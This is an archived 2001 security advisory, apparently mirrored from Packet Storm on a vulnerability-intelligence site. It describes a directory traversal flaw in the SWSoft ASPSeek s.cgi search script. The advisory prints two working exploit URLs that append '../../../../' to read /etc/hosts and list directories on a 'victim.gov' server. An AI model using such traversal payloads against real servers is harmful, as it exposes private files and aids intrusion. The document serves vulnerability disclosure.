Lucene search

K

ASPSeek.txt

๐Ÿ—“๏ธย 27 Mar 2001ย 00:00:00Reported byย TackTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 14ย Views

SWSoft ASPSeek s.cgi script vulnerability allows file exposure via crafted URLs.

Show more
Code
`Hi comrades:  
  
I'dont speak (write) wery good English by this reason a go to pass to   
describe the information that I have and I could test about this   
vulnerability:  
  
I know some servers whit this bug, I only test it in this type of   
servers but should run in others whitout problems.  
(Tested in Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3)  
  
Name : SWSoft ASPSeek s.cgi script "show files" Vulnerability.  
  
Problem: Adding the string "/../../../../" to an URL allows an  
attacker to view any file on the server, and  
also list directories within the server.  
  
Exploit:  
  
http://your.victim.gov/cgi-bin/s.cgi?../../../../etc/hosts  
http://your.victim.gov/cgi-bin/s.cgi?../../../../etc/  
  
Salud y (A) !!!!  
  
_TacK_ ([email protected])  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Mar 2001 00:00Current
7.4High risk
Vulners AI Score7.4
14
.json
Report